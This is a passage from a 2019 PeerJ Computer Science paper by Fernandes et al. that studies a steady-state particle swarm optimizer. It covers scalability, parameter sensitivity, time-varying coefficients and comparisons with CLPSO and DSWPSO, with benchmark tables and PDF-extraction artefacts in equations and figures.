8.33e-32 4.59e-34 5.00e+03 170,091 136,062 195,498 47 f3 3.01e-27 9.54e-34 1.00e+05 11,718 8,208 36,000 35 1.66e-12 1.30e-13 2.25e-11 21,118 19,548 23,283 50 f4 1.30e+02 7.46e+01 2.00e+02 15,192 8,964 108,495 9 5.62e+01 2.39e+01 8.76e+01 11,052 5,679 23,571 50 f5 3.08e-02 0.00e00 1.81e+02 10,287 8,694 26,838 12 0.00e00 0.00e00 8.33e-02 19,849.5 17,748 26,739 36 f6 3.59e-04 0.00e00 9.72e-03 39,811.5 1,242 140,247 38 0.00e00 0.00e00 9.72e-03 8,460 3,276 62,091 50 f7 7.52e00 2.64e00 1.57e+01 – – – 0 1.58e-03 0.00e00 2.48e00 33,912 31,239 41,211 30 f8 2.28e00 8.86e-16 3.84e00 20,898 13,158 28,764 6 1.11e-15 8,86e-16 1.33e-15 19,822.5 18,252 25,416 50 f9 1.06e-01 1.98e-03 1.53e+04 902,407 812,736 949,590 12 1.64e-04 1.44e-06 6.01e+01 736,713 546,858 891,432 49 f10 1.04e+01 0.00e00 4.04e+02 16,065 8,388 23,742 2 3.70e-03 0.00e00 5.09e-01 21,915 18,567 50,607 39 Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 12/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ than replace-random. The experiment demonstrates that selective pressure imposed on the least fit individuals is the major factor in the performance of SS-PSO. Scalability The proof-of-concept showed that SS-PSO outperforms S-PSO in most of the functions in the test set, and the previous experiment demonstrates that the major factor in the performance enhancement is the pressure on the least fit particles. However, only instances of the problems with D = 30 have been tested; therefore, another question arises at this point: does the improvement shown by SS-PSO hold for a wide range of problem sizes? In order to answer that question, we have conducted a scalability study: the algorithms were tested on the same set functions but with D ranging from 10 to 50 (except f6, which is a two-dimensional function and for that reason was excluded from this test). As in previous experiments, the algorithms were first run for a limited amount of function evaluations and the best fitness values were recorded. Then, the algorithms were all run for 980,000 evaluations or until reaching a function-specific stop criterion. The number of iterations required to meet the criterion was recorded and statistical measures were taken over 50 runs. (Function f10 has not been tested for dimensions 20 and 40 because the CEC2005 benchmark, from where the orthogonal rotational matrices M have been taken, does not provide the matrices for those dimensions). Table 11 shows the median best fitness values attained by each algorithm on each instance of the problems and Table 12 shows the success rates. In terms of quality of 1.0 1.5 2.0 2.5 3.0 rep. best rep. random rep. worst Figure 2 Fitness rank by Friedman test. Full-size DOI: 10.7717/peerj-cs.202/fig-2 Table 10 Comparing replace-worst and replace-random with the Mann-Whitney test. f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 Fitness + + + ≈ ≈ ≈ + + + ≈ Evaluations + + + - + + + + + + Notes: +If replace-worst ranks first in the Mann–Whitney test and the result is significant. -If replace-random ranks first and the result is significant. ≈If the differences are not significant. Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 13/30 http://dx.doi.org/10.7717/peerj-cs.202/fig-2 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ solutions, the performance patterns observed with D = 30 are maintained: the strategy does not introduce scalability difficulties. As for the success rates, except for a few instances, SS-PSO attains better or equal success rates. The convergence speed has been graphically represented for better assessment of the effects of growing problem size—see Fig. 3. The graphs show that the proposed strategy does not introduce scalability difficulties (other than the ones intrinsic to standard PSOs). It also shows that, in general, SS-PSO is faster than S-PSO. Parameter sensitivity Particle swarm optimization performance can be severely affected by the parameter values. The inertia weight and acceleration coefficients must be tuned in order to balance exploration and exploitation: if far from the optimal values, convergence speed and/or solution quality can be significantly reduced. Population size also influences the performance of population-based metaheuristics: larger populations help to maintain Table 11 Solutions quality with different problem dimension. D = 10 D = 20 D = 30 D = 40 D = 50 S-PSO SS-PSO S-PSO SS-PSO S-PSO SS-PSO S-PSO SS-PSO S-PSO SS-PSO f1 1.06e-37 2.71e-47 1.87e-19 5.72e-24 1.04e-11 7.83e-15 7.15e-08 2.96e-10 3.69e-05 2.01e-10 f2 0.00e00 0.00e00 4.63e-82 1.37e-89 1.17e-30 9.52e-54 1.18e-13 1.10e-20 1.36e-06 2.36e-06 f3 1.57e-40 0.00e00 2.08e-19 3.37e-24 2.76e-11 1.58e-14 8.77e-07 2.58e-09 4.59e-04 3.19e-06 f4 1.99e00 1.99e00 2.09e+01 2.04e+01 6.17e+01 5.12e+01 1.01e+02 1.06e+02 1.70e+02 1.37e+02 f5 2.83e-02 3.60e-02 8.63e-03 1.11e-02 0.00e00 7.40e-03 0.00e00 7.40e-03 0.00e00 0.00e00 f7 0.00e00 0.00e00 0.00e00 0.00e00 9.03e-04 0.00e00 9.03e-04 3.39e-04 1.34e-01 2.15e-02 f8 4.44e-16 4.44e-16 8.88e-16 8.88e-16 8.88e-16 8.88e-16 1.33e-15 1.33e-15 1.33e-15 1.33e-15 f9 0.00e00 0.00e00 1.92e-10 1.32e-10 9.8e-05 1.01e-05 6.18e+01 3.40e+01 1.34e+03 1.70e+03 f10 3.20e-02 3.20e-02 – – 7.40e-03 7.40e-03 – – 0.00e00 0.00e00 Note: Best median fitness among the two algorithms shown in bold. Table 12 Success rates with different problem dimension. D = 10 D = 20 D = 30 D = 40 D = 50 S-PSO SS-PSO S-PSO SS-PSO S-PSO SS-PSO S-PSO SS-PSO S-PSO SS-PSO f1 50 50 50 50 50 50 50 50 50 50 f2 50 50 50 50 50 50 43 50 32 48 f3 50 50 50 50 50 50 50 50 50 50 f4 50 50 50 50 49 49 25 21 0 3 f5 40 37 49 50 50 47 50 49 50 50 f7 50 50 49 49 34 48 8 35 4 19 f8 50 50 50 50 50 50 50 50 46 50 f9 50 50 50 50 47 50 0 0 0 0 f10 44 35 – – 46 48 – – 48 49 Note: Best success rates among the two algorithms shown in bold. Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 14/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ 0 10000 20000 30000 40000 D = 10 D = 20 D = 30 D = 40 D = 50 ev al ua �o ns (A) Sphere S-PSO Moore SS-PSO Moore 0 100000 200000 300000 400000 500000 600000 700000 D = 10 D = 20 D = 30 D = 40 D = 50 ev al ua �o ns (B) Quadric S-PSO Moore SS-PSO Moore 0 10000 20000 30000 40000 50000 D = 10 D = 20 D = 30 D = 40 D = 50 ev al ua �o ns (C) Hyper S-PSO Moore SS-PSO Moore 0 20000 40000 60000 80000 100000 120000 D = 10 D = 20 D = 30 D = 40 D = 50 ev al ua �o ns (D) Rastrigin S-PSO Moore SS-PSO Moore 0 5000 10000 15000 20000 25000 30000 35000 D = 10 D = 20 D = 30 D = 40 D = 50 ev al ua �o ns (E) Griewank S-PSO Moore SS-PSO Moore 0 10000 20000 30000 40000 50000 60000 70000 D = 10 D = 20 D = 30 D = 40 D = 50 ev al ua �o ns (F) Weierstrass S-PSO Moore SS-PSO Moore 0 10000 20000 30000 40000 D = 10 D = 20 D = 30 D = 40 D = 50 ev al ua �o ns (G) Ackley S-PSO Moore SS-PSO Moore 0 200000 400000 600000 800000 D = 10 D = 20 D = 30 D = 40 D = 50 ev al ua �o ns (H) Shi�ed Quadric with noise S-PSO Moore SS-PSO Moore 0 5000 10000 15000 20000 25000 30000 35000 40000 D = 10 D = 30 D = 50 ev al ua �o ns (I) Rotated Griewank S-PSO Moore SS-PSO Moore Figure 3 Convergence speed versus problem dimension for Sphere (A), Quadric (B), Hyper (C), Rastrigin (D), Griewank (E), Weierstrass (F), Ackley (G), Shifted Quadric with Noise (H) and Rotated Griewank (I) benchmark functions. Full-size DOI: 10.7717/peerj-cs.202/fig-3 Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 15/30 http://dx.doi.org/10.7717/peerj-cs.202/fig-3 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ diversity, but they slow down convergence speed; on the other hand, smaller populations are faster but they are more likely to converge to local optima. Furthermore, PSOs empirical studies usually depend on a single set of parameters for several functions with different characteristics. This is the case of this paper, in which a typical parameter setting has been used for evaluating the performance of the PSOs. That set of parameters is not expected to be the optimal tuning for every function, but instead a compromised solution to avoid the exponential growth of experimental procedures. For these reasons, when testing a new PSO, it is important to investigate its sensitivity to the parameter values. With that purpose in mind, the following experimental procedure has been designed. Synchronous PSO and SS-PSO were tested on function f1 (unimodal), f2 (multimodal), f9 (shifted and noisy) and f10 (rotated) with the following parameter values: inertia weight was set to 0.6798, 0.7048, 0.7298, 0.7548 and 0.7798, while acceleration coefficients and population size remained fixed at 1.494 and 49; then, c1 and c2 were set to 1.294, 1.394, 1.494, 1.594 and 1.694 while v and m remained fixed at 0.7298 and 49, respectively; finally, population size was set to 36, 49 and 64, while v and the acceleration coefficients were set to 0.7298 and 1.4962. The results are depicted in Figs. 4–7. The graphics show that the performance indeed varies with the parameter values, as expected. In the case of function f1, other parameter settings attain better results than the ones used in previous section. However, the relative performance of S-PSO and SS-PSO maintains throughout the parameters ranges. In functions f8, f9 and f10, the quality of solutions is in general maximized by v and c values around the ones used in previous sections. Convergence speed, in general, improves with lower v, c and m values. As seen in Fig. 1, S-PSOMoore ranks first in terms of solutions quality and convergence speed when compared to ring and von Neumann topologies. Although not a parameter in the strict sense of the term, the network topology is a design choice that significantly affects the performance of the algorithm: Kennedy & Mendes (2002) investigated several types of networks and recommend the use of von Neumann lattices; Fernandes et al. (2018) tested regular graphs and concluded that convergence speed improves with the degree of connectivity but success rates are in general degraded when k is above nine (equivalent to Moore neighborhood) and a that good compromise is achieved with 5 � k � 13. In order to study the performance of SS-PSO with different network topologies, regular graphs have been constructed with the following procedure: starting from a ring structure with k = 3, the degree is increased by linking each individual to its neighbors’ neighbors, creating a set of regular graphs with k ¼ f3; 5; 7; 9; 11 . . . ; mg, as exemplified in Fig. 8 for population size 7. Parameters c1 and c2 were set to 1.494 and v to 0.7298 and population size m was set to 33. The algorithms were all run for 660,000 function evaluations or until reaching the function-specific stop criterion given in Table 1. Each algorithm has been executed 50 times with each function and statistical measures were taken over those 50 runs. Figure 9 shows the success rates and convergence speed of SS-PSO structured by topologies with varying k. Convergence generally improves with k, achieving optimal values for 13 � k � 25 in most of the functions. However, as seen in Fig. 9A, best success rates are achieved when 7 � k � 13 (except f10, for which k = 5 is the best topology). Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 16/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ 1.E-22 1.E-20 1.E-18 1.E-16 1.E-14 1.E-12 1.E-10 1.E-08 1.E-06 1.E-04 1.E-02 1.E+00 0.679844 0.704844 0.729844 0.754844 0.779844 fit ne ss iner�a weight, ω A S-PSO SS-PSO 0 5000 10000 15000 20000 25000 30000 35000 40000 0.679844 0.704844 0.729844 0.754844 0.779844 ev al ua �o ns iner�a weight, ω B S-PSO SS-PSO 1.E-24 1.E-21 1.E-18 1.E-15 1.E-12 1.E-09 1.E-06 1.E-03 1.E+00 1.294 1.394 1.494 1.594 1.694 fit ne ss accelera�on coefficients, c1, c2 C S-PSO SS-PSO 0 5000 10000 15000 20000 25000 30000 35000 40000 45000 1.294 1.394 1.494 1.594 1.694 ev al ua �o ns accelera�on coefficients, c1, c2 D S-PSO SS-PSO 1E-21 1E-19 1E-17 1E-15 1E-13 1E-11 1E-09 1E-07 1E-05 0.001 0.1 36 49 64 fit ne ss popula�on size, � E S-PSO SS-PSO 0 5000 10000 15000 20000 25000 30000 36 49 64 ev al ua �o ns popula�on size, � F S-PSO SS-PSO Figure 4 Fitness (A, C, E) and number of evaluations sensitivity (B, D, F) on sphere function (f1) to inertia weight (A–B), acceleration coefficients (C–D) and population size (E–F). Full-size DOI: 10.7717/peerj-cs.202/fig-4 Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 17/30 http://dx.doi.org/10.7717/peerj-cs.202/fig-4 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ 1E-16 1E-15 1E-14 0.679844 0.704844 0.729844 0.754844 0.779844 fit ne ss iner�a weight, ω A S-PSO SS-PSO 0 5000 10000 15000 20000 25000 30000 35000 40000 0.679844 0.704844 0.729844 0.754844 0.779844 ev al ua �o ns iner�a weight, ω B S-PSO SS-PSO 1E-16 1E-15 1E-14 1.294 1.394 1.494 1.594 1.694 fit ne ss accelera�on coefficients, c1, c2 C S-PSO SS-PSO 0 5000 10000 15000 20000 25000 30000 35000 40000 45000 1.294 1.394 1.494 1.594 1.694 ev al ua �o ns accelera�on coefficients, c1, c2 D S-PSO SS-PSO 1E-16 1E-15 1E-14 36 49 64 fit ne ss popula�on size, µ E S-PSO SS-PSO 0 5000 10000 15000 20000 25000 30000 36 49 64 ev al ua �o ns popula�on size, µ F S-PSO SS-PSO Figure 5 Fitness (A, C, E) and number of evaluations sensitivity (B, D, F) on Ackley function (f8) to inertia weight (A–B), acceleration coefficients (C–D) and population size (E–F). Full-size DOI: 10.7717/peerj-cs.202/fig-5 Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 18/30 http://dx.doi.org/10.7717/peerj-cs.202/fig-5 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ 1.E-06 1.E-05 1.E-04 1.E-03 1.E-02 1.E-01 1.E+00 0.679844 0.704844 0.729844 0.754844 0.779844 fit ne ss iner�a weight, ω A S-PSO SS-PSO 400000 500000 600000 700000 800000 900000 1000000 0.679844 0.704844 0.729844 0.754844 0.779844 ea lu a� on s iner�a weight, ω B S-PSO SS-PSO 1.E-06 1.E-05 1.E-04 1.E-03 1.E-02 1.E-01 1.E+00 1.E+01 1.E+02 1.294 1.394 1.494 1.594 1.694 fit ne ss accelera�on coefficients, c1, c2 C S-PSO SS-PSO 400000 500000 600000 700000 800000 900000 1000000 1.294 1.394 1.494 1.594 1.694 ev al ua �o ns accelera�on coefficients, c1, c2 D S-PSO SS-PSO 1.E-06 1.E-05 1.E-04 1.E-03 1.E-02 1.E-01 1.E+00 36 49 64 fit ne ss popula�on size, µ E S-PSO SS-PSO 400000 500000 600000 700000 800000 900000 1000000 36 49 64 ev al ua �o ns popula�on size, µ F S-PSO SS-PSO Figure 6 Fitness (A, C, E) and number of evaluations sensitivity (B, D, F) on shifted quadric with noise function (f9) to inertia weight (A–B), acceleration coefficients (C–D) and population size (E–F). Full-size DOI: 10.7717/peerj-cs.202/fig-6 Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 19/30 http://dx.doi.org/10.7717/peerj-cs.202/fig-6 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ 0.E+00 2.E-03 4.E-03 6.E-03 8.E-03 1.E-02 1.E-02 0.679844 0.704844 0.729844 0.754844 0.779844 fit ne ss iner�a weight, ω A S-PSO SS-PSO 0 5 000 10 000 15 000 20 000 25 000 30 000 35 000 0.679844 0.704844 0.729844 0.754844 0.779844 fit ne ss iner�a weight, ω B S-PSO SS-PSO 0.E+00 2.E-03 4.E-03 6.E-03 8.E-03 1.E-02 1.E-02 1.294 1.394 1.494 1.594 1.694 fit ne ss accelera�on coefficients, c1, c2 C S-PSO SS-PSO 0.E+00 5.E+03 1.E+04 2.E+04 2.E+04 3.E+04 3.E+04 4.E+04 4.E+04 5.E+04 1.294 1.394 1.494 1.594 1.694 fit ne ss accelera�on coefficients, c1, c2 D S-PSO SS-PSO 0.E+00 2.E-03 4.E-03 6.E-03 8.E-03 1.E-02 1.E-02 36 49 64 fit ne ss popula�on size, μ E S-PSO SS-PSO 0.E+00 5.E+03 1.E+04 2.E+04 2.E+04 3.E+04 3.E+04 36 49 64 fit ne ss popula�on size, μ F S-PSO SS-PSO Figure 7 Fitness (A, C, E) and number of evaluations sensitivity (B, D, F) on Griewank function (f10) to inertia weight (A–B), acceleration coefficients (C–D) and population size (E–F). Full-size DOI: 10.7717/peerj-cs.202/fig-7 Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 20/30 http://dx.doi.org/10.7717/peerj-cs.202/fig-7 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ These conclusions are similar to those by Fernandes et al. (2018) related to the standard PSO and are coincident with the typical rule of thumb for PSOs: highly connected topologies are faster but less reliable, while topologies with lower connectivity require more evaluations to meet the convergence criteria but converge more often to the solution. Please remember that we are not trying to find the best set of parameters for each function. The most important conclusions here is that SS-PSO does not seem to be more sensitive to the parameters than S-PSO, displaying similar patterns when varying v, c1 and c2 and m, and that the performance enhancement brought by SS-PSO is observed on a reasonably wide range of parameter values. Time-varying parameters An alternative approach to parameter tuning is to let the parameters values change during the run, according to deterministic or adaptive rules. In order to avoid tuning effort and adapt the balance between local and global search to the search stage, Shi & Eberhart (1999) proposed a linearly time-varying inertia weight: starting with an initial and pre-defined value, the parameter value decreases linearly with time, until it reaches the minimum value. The variation rule is given by Eq. (3): v tð Þ ¼ v1 � v2ð Þ � max t � tð Þ max t þ v2 (3) where t is the current iteration, max_t is the maximum number of iterations, v1 the inertia weigh initial value and v2 its final value. (A) k = 3 (B) k = 5 (C) k = 7 = μ Figure 8 Regular graphs with population size μ = 7 and k = 3 (A), k = 5 (B) and k = 7 = μ (C). Full-size DOI: 10.7717/peerj-cs.202/fig-8 A B 0 10 20 30 40 50 k = 3 k = 5 k = 7 k = 9 k = 13 k = 17 k = 25 k = 33 su cc es sf ul ru ns f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 0 10000 20000 30000 40000 50000 60000 70000 k = 3 k = 5 k = 7 k = 9 k = 13 k = 17 k = 25 k = 33 fit ne ss e va lu a� on s f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 Figure 9 SS-PSO with different topologies. (A) Success rates. (B) Mean fitness evaluations to a solution. Full-size DOI: 10.7717/peerj-cs.202/fig-9 Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 21/30 http://dx.doi.org/10.7717/peerj-cs.202/fig-8 http://dx.doi.org/10.7717/peerj-cs.202/fig-9 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ Later, Ratnaweera, Halgamuge & Watson (2004) tried to improve Shi and Eberhart’s PSO with time-varying inertia weight (PSO-TVIW) using a similar concept applied to the acceleration coefficients. In the PSO with time-varying acceleration coefficients PSO (PSO-TVAC) the parameters c1 and c2 change during the run according to the following equations: c1 ¼ c1f � c1i � � � t max t þ c1i (4) c2 ¼ c2f � c2i � � � t max t þ c2i (5) where c1i, c1f, c2i, c2f are the acceleration coefficients initial and final values. The experiments in this section compare PSO-TVAC with SS-PSO-TVAC (i.e., PSO- TVAC with the steady-state update strategy). Parameters v1 and v2 were set to 0.75 and 0.5. The acceleration coefficient c1 initial and final values were set to 2.5 and 0.5 and c2 ranges from 0.5 to 2.5, as suggested by Ratnaweera, Halgamuge & Watson (2004). The results are in Table 13 (PSO-TVAC) and Table 14 (SS-PSO-TVAC). Table 15 compares the algorithms using Mann–Whitney tests. SS-PSO-TVAC improves PSO-TVAC in every unimodal function in terms of accuracy and convergence speed and it is significantly faster in functions f6, f7, f8 and f10 while attaining similar results. PSO-TVAC only outperforms SS-PSO-TVAC in the noisy f9 function. These results show that the steady state version of PSO-TVAC is able to improve the convergence speed of the original algorithm in several types of fitness landscapes. Furthermore, SS-PSO-TVAC achieves more accurate solutions in the unimodal problems. Comprehensive learning PSO The following experiment aims at comparing the proposed SS-PSO with the CLPSO (Liang et al., 2006; Lynn & Suganthan, 2015). CLPSO uses an alternative velocity updating equation: vi;d tð Þ ¼ v � vi;d t � 1ð Þ þ c � r � pfi dð Þ;d � xi;d t � 1ð Þ � � (6) Table 13 PSO-TVAC results. Fitness Evaluations SR Median Min Max Median Min Max f1 2.85e-21 2.55e-22 1.84e-20 11,956 11,221 13,181 50 f2 4.47e-51 1.23e-54 5.00e03 208,740 185,514 238,532 49 f3 3.87e-21 3.01e-22 1.57e-19 13,769 12,740 16,121 50 f4 3.08e+01 1.11e+01 5.8e+01 31,114 16,661 59,388 50 f5 0.00e00 0.00e00 4.91e-02 15,141 12,642 91,238 50 f6 0.00e00 0.00e00 0.00e00 11,956 5,145 38,612 49 f7 0.00e00 0.00e00 1.64e-01 35,280 31,017 42,336 49 f8 7.55e-15 4.00e-15 7.55e-15 21,070 17,346 29,988 50 f9 6.14e-09 1.74e-09 6.28e-06 227,066 199,528 287,042 47 f10 7.40e-03 0.00e00 5.24e-01 18,620 14,602 87,220 42 Note: Medians are shown in bold if PSO-TVAC provides similar or better results than SS-PSO-TVAC (Table 14). Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 22/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ where fi ! ¼ fi 1ð Þ; fi 2ð Þ; . . . fi Dð Þð Þ defines which particle’s best solutions particle i should follow. Hence, the term pfi(d),d can refer to the corresponding dimension of any particle’s best found solution so far. The decision depends on a probability pc, different for each particle and computed a priori. Following the guidelines and parameters in Liang et al. (2006), CLPSO and SS-CLPSO have been implemented and tested in the set of 10 benchmark functions. Comprehensive-learning PSO performance is strongly dependent on the refreshing gap parameter m, which defines the number of generations during which the particles are allowed to learn from fi without improving their fitness. After m generations without fitness improvement, fi is reassigned. In order to make fair comparisons, parameter m was first optimized for each function. The other parameters were set as in Liang et al. (2006). Then, SS-CLPSO was tuned using the same parameter setting as the corresponding CLPSO. The results are in Tables 16 and 17 and statistical analysis is in Table 18. On the one hand, the results show that, in general, a steady-state strategy applied to CLPSO does not improve the performance of the algorithm. On the other hand, SS-CLPSO does not degrade the general behavior of CLPSO. Please note that CLPSO does not use a traditional topology. In this case, to construct SS-CLPSO, we use a Moore neighborhood to decide which particles to update along with the least fit individuals, but, unlike SS-PSO or SS-PSO-TVAC, the structure does not define the information flow within the swarm. Table 14 SS-PSO-TVAC results. Fitness Evaluations SR Median Min Max Median Min Max f1 7.85e-26 4.82e-27 2.35e-24 10,417 9,126 11,322 50 f2 5.18e-63 2.30e-67 5.77e-60 190,458 168,282 226,062 50 f3 1.66e-25 7.76e-27 9.14e-24 11,925 10,422 13,923 50 f4 3.48e+01 1.89e01 7.46e+01 38,043 22,032 108,927 50 f5 0.00e00 0.00e00 4.42e-02 13,662 9,963 56,421 49 f6 0.00e00 0.00e00 0.00e00 8,421 2,547 26,325 49 f7 0.00e00 0.00e00 2.62e-01 31,752 28,323 41,193 43 f8 7.55e-15 4.00e-15 7.55e-15 18,756 14,958 23,904 49 f9 5.41e-09 6.37e-10 5.80e-03 315,792 192,906 476,532 48 f10 0.00e00 0.00e00 3.93e-02 15,948 12,762 75,510 40 Note: Medians are shown in bold if SS-PSO-TVAC provides similar or better results than PSO-TVAC (Table 13). Table 15 Comparing SS-PSO-TVAC and PSO-TVAC with the Mann-Whitney test. f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 Fitness + + + ≈ ≈ ≈ ≈ ≈ ≈ ≈ Evaluations + + + ≈ ≈ + + + - + Notes: +If SS-PSO-TVAC ranks first in the Mann–Whitney test and the result is significant. -If PSO-TVAC ranks first and the results is significant. ≈If the differences are not significant. Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 23/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ Since neighboring particles communicate and use each other’s information, they tend to travel through similar regions of the landscape, but in CLPOS there is not necessarily a relationship between the particles in the set and this clustering behavior is not present. For a steady-state strategy to take full advantage of the CLPSO dynamic network, maybe it Table 16 CLPSO results. Fitness Evaluations Median Min Max Median Min Max SR f1 9.59e-07 4.00e-07 2.23e-06 34,848 33,355 35,909 50 f2 2.16e-01 8.66e-02 5.46e-01 – – – – f3 2.31e-06 1.18e-06 4.96e-06 36,777 35,665 37,972 50 f4 4.97e00 1.99e00 1.20e+01 115,701 94,674 129,493 50 f5 0.00e00 0.00e00 9.74e-13 199,537 164,774 243,806 50 f6 6.49e-06 7.69e-09 1.13e-04 81,149 37,710 96,320 31 f7 8.67e-13 3.48e-13 1.61e-12 430,069 418,700 440,035 50 f8 7.55e-15 4.00e-15 7.55e-15 282,613 275,897 285,290 50 f9 4.36e-01 1.51e-01 1.11e00 – – – – f10 0.00e00 0.00e00 2.26e-14 173,346 151,269 229,975 50 Note: Medians are shown in bold if CLPSO provides similar or better results than SS-CLPSO (Table 17). Table 17 SS-CLPSO results. Fitness Evaluations Median Min Max Median Min Max SR f1 1.33e-06 2.99e-07 4.98e-06 35,998 34,063 37,956 50 f2 5.14e-01 1.71e-01 1.44e00 – – – – f3 1.46e-06 4.82e-07 7.44e-06 36,079 33,177 37,961 50 f4 4.09e+00 1.04e00 1.05e+01 190,310 147,544 217,855 50 f5 0.00e00 0.00e00 2.16e-14 181,779 137,821 225,172 50 f6 6.64e-06 3.10e-07 6.90e-05 86,058 45,530 97,936 28 f7 6.26e-11 3.27e-12 1.69e-08 409,351 393,553 423,387 50 f8 7.55e-15 4.00e-15 7.55e-15 358,407 344,448 374,581 50 f9 7.70e-01 3.26e-01 6.16e01 – – – – f10 0.00e00 0.00e00 1.04e-13 152,818 122,165 207,094 50 Note: Medians are shown in bold if SS-CLPSO provides similar or better results than CLPSO (Table 16). Table 18 Comparing SS-PSO and CLPSO with the Mann-Whitney test. f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 Fitness ≈ ≈ ≈ ≈ ≈ ≈ - ≈ ≈ ≈ Eval. ≈ – ≈ - + ≈ + - – + Notes: +If SS-PSO ranks first in the Mann–Whitney test and the result is significant. -If CLPSO ranks first and the results is significant. ≈If the differences are not significant. Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 24/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ is necessary to define a dynamic update strategy which takes into account the current set of particles from which an individual is learning at a specific period of the run. Steady-state updates strategies for PSO in dynamic networks is planned as future work. Dynamic small world PSO The final experiment compares SS-PSO with the DSWPSO, recently proposed by Vora & Mirlanalinee (2017). DSWPSO uses a static von Neumann topology to which a number of random connections are added in each iteration. It is a very simple variation of the standard PSO, but it attains quite interesting results when compared to a number of state-of-the-art PSOs. For this paper, DSWPSO was tested with von Neumann and Moore topologies. The number of random neighbors in each topology was set to 2, as suggested by Vora & Mirlanalinee (2017). Parameters c1 and c2 were set to 1.494 and v to 0.7298. The algorithms were all run for 200,000 function evaluations. DSWPSO results are Table 19 DSWPSO with von Neumann neighborhood and two random neighbors. Fitness Evaluations Median Min Max Median Min Max SR f1 8.72e-12 1.07e-12 5.33e-11 20,188 18,767 22,589 50 f2 6.80E-36 5.61E-39 1.00e+04 151,704 121,765 218,393 49 f3 3.24e-11 1.14e-12 3.21e-10 22,981 20,972 26,166 50 f4 6.27e+01 2.69e+01 1.07e+02 11,417 5,586 31,654 47 f5 0.00e+00 0.00e+00 4.91e-02 19,477.5 17,101 25,627 50 f6 0.00e+00 0.00e+00 9.72e-03 7,448 2,989 28,567 43 f7 2.38e-02 0.00e+00 2.02e+00 34,937 32,977 40,180 20 f8 7.55e-15 4.00e-15 1.34e+00 20,972 18,767 24,892 47 f9 1.43e-05 6.42e-09 6.63e+03 639,842 374,066 901,110 41 f10 7.40e-03 0.00e+00 5.17e-01 21,021 18,130 25,284 47 Table 20 DSWPSO with Moore neighborhood and two random neighbors. Fitness Evaluations Median Min Max Median Min Max SR f1 1.13e-12 8.12e-14 1.92e-11 19,306 17,395 21,119 50 f2 4.86e-38 2.52e-41 5.00e+03 141,708 121,079 219,520 45 f3 4.72e-12 7.08e-13 4.46e-11 22,050 19,845 25,480 50 f4 6.22e+01 3.48e+01 1.34e+02 10,731 6,958 23,520 47 f5 7.40e-03 0.00e+00 2.70e-02 18,497.5 16,611 20,531 50 f6 0.00e+00 0.00e+00 9.72e-03 6,811 3,136 25,480 48 f7 1.01e-01 0.00e+00 3.06e+00 35,035 32,683 39,494 16 f8 7.55e-15 4.00e-15 1.16e+00 20,090 16,954 24,941 47 f9 3.25e-05 4.29e-09 7.12e+03 620,487 365,981 916,692 35 f10 8.63e-03 0.00e+00 8.00e+00 19,747 17,052 25,235 43 Fernandes et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.202 25/30 http://dx.doi.org/10.7717/peerj-cs.202 https://peerj.com/computer-science/ presented in Table 19 (von Neumann) and Table 20 (Moore). The statistical analysis that compares SS-PSO and DSWPSO are in Table 21 (von Neumann) and Table 22 (Moore). It is clear that SS-PSO outperforms DSWPSO with both von Neumann and Moore base-topology in most of the functions, not only in terms of convergence speed, but also in solution quality. Figure 10 shows the convergence curves (median best fitness values over 50 runs) of S-PSO, SS-PSO and DSWPSO (von Neumann). The graphics show that SS-PSO converges faster to the vicinity of the solutions. Furthermore, and although it is not perceivable in the graphics, SS-PSO eventually reaches solutions closer to f(x) = 0 (the optimum of both functions) as demonstrated by Tables 8 and 21. Running times A final experiment compares S-PSO and SS-PSO running times. The algorithms are run on function f7 with D set to 10, 30, 50 and 100. Moore neighborhood is used in both Table 21 Comparing SS-PSO and DSWPSO (von Neumann) with the Mann-Whitney test. f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 Fitness + + + ≈ ≈ + + + + + Eval. + + + + + + + + ≈ + Notes: +If SS-PSO ranks first in the Mann–Whitney test and the result is significant. -If DSWPSO ranks first and the results is significant. ≈If the differences are not significant. Table 22 Comparing SS-PSO and DSWPSO (Moore) with the Mann-Whitney test. f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 Fitness + + + ≈ ≈ ≈ + + + + Eval. + + + + + ≈ + + ≈ + Notes: +If SS-PSO ranks first in the Mann–Whitney test and the result is significant. -If DSWPSO ranks first and the results is significant. ≈If the differences are not significant. 0 0.2 0.4 0.6 0.8 1 fit ne ss 